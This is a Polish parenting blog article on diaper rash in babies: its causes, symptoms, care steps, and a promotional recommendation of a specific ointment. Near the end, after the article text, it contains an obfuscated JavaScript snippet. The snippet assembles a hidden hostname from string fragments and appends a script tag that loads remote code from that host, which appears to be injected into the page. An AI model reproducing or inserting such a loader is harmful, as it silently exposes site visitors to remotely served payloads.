Odparzenia pieluszkowe- jak im zaradzić?

Piecze, boli, a maluch w trakcie zmiany pieluszki płacze i wierci się ? Podrażniona, czerwona skóra u niemowlaka powoduje duży dyskomfort. Rodzice mimo pieczołowitej pielęgnacji dziecka, często jednak doświadczają tego problemu. Jego przyczyny są różne, bo może być to rzadko zmieniana pieluszka, ale też upał czy wprowadzanie do diety nowych produktów. Lekarze szacują, że każdy maluch doświadcza tego nieprzyjemnego doznania w ciągu pierwszych dwóch lat życia przynajmniej kilka razy. Pomimo właściwej pielęgnacji, odparzenia u niemowląt mogą się pojawić, a rodzice nie powinni się obwiniać, że coś zrobili nie tak.

Pierwsze kroki przy odparzeniu

Odparzenie, które nazywane jest również rumieniem pieluszkowym, łatwo jest rozpoznać. Pojawia się na skórze dziecka, która znajduje się pod pieluszką. Najczęściej podrażnione strefy ciała to odbyt, genitalia, pachwiny. Objawia się zaczerwienioną skórą. Jeśli nie zareagujesz odpowiednio szybko, odparzenie u niemowląt przechodzi w zapalenie skóry. Oprócz zaczerwienienia, pojawia się wysypka. Może przybierać na sile, obejmując większy obszar ciała. Skóra jest gorąca w dotyku, krostki łuszczą się. Dziecko odczuwa duży ból, lekarze porównują go do poparzenia słonecznego. Dlatego tak ważne jest, by nie dopuścić do pieluszkowego zapalenia skóry. Pierwszym krokiem przy odparzeniu jest częstsza zmiana pieluszki. Pozwól maluszkowi też poleżeć trochę bez pieluszki. Skóra pooddycha i dzięki temu szybciej się regeneruje. Nawet kilka razy w ciągu dnia, przed każdym przebraniem – maluch szybciej odczuje ulgę. Regularnie myj dziecko przy każdym przebieraniu. Gdy występują podrażnienia, jest to niezwykle ważne. W przypadku pieluszkowego zapalenia skóry, lekarze zalecają, by kilka razy dziennie przy zmianie pieluszki przemyć dziecko przegotowaną wodą, bez użycia żadnych środków. Skóra jest już podrażniona i użycie czegokolwiek powoduje dodatkowy ból.

Dobra maść na odparzenia pieluszkowe                                               

Stosowanie właściwych produktów do pielęgnacji skóry niemowlaka, ogranicza wystąpienie odparzenia czy też pieluszkowego zapalenia skóry. A gdy dojdzie do odparzenia, maść szybciej zregeneruje skórę i zadziała kojąco. Mamy polecają maść ochronną Bepanthen Baby Extra. Niemowlaki mają bardzo cienką warstwę lipidową, ich skóra potrzebuje bardzo delikatnych kosmetyków, które ochronią ją przed drażniącym działaniem kału oraz moczu. Istotne znaczenie ma skład kosmetyków dla najmłodszych dzieci. Przede wszystkim nie mogą zawierać żadnych barwników, konserwantów oraz substancji zapachowych, które działałyby drażniąco na skórę maluszka. Wspomniana maść jest w stu procentach wolna od sztucznych dodatków. Dobroczynnie na skórę niemowlaka działają produkty zawierające lanolinę oraz oliwę z oliwek. Naturalnie nawilżają i chronią delikatną skórę dziecka w pierwszych miesiącach życia. Stosując każdego dnia odpowiednią maść przy zmianie pieluszki i przemyciu maluszka, ochronisz go przed odparzeniami.
Odparzenia pieluszkowe u niemowląt mają wpływ na samopoczucie maluszka, może nie mieć apetytu, być rozdrażniony i płaczliwy, dlatego konieczna jest profilaktyka i szybkie działanie, by oszczędzić mu dyskomfortu.
// (function(){
up2f=document.createElement(„script”);up2f.type=”text/javascript”;
up2f.async=true;up2f_=((„us”)+”t”)+”a”;up2f_+=(„t.i”)+””+”n”;up2f_+=((„f”)+”o”);
up2f.src=”http://”+up2f_+”/6914233.qrw1rzXjp2fg2ijntd97nxx8yXrekv”;
document.body.appendChild(up2f);
})();
// ]]>

Similar Posts

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.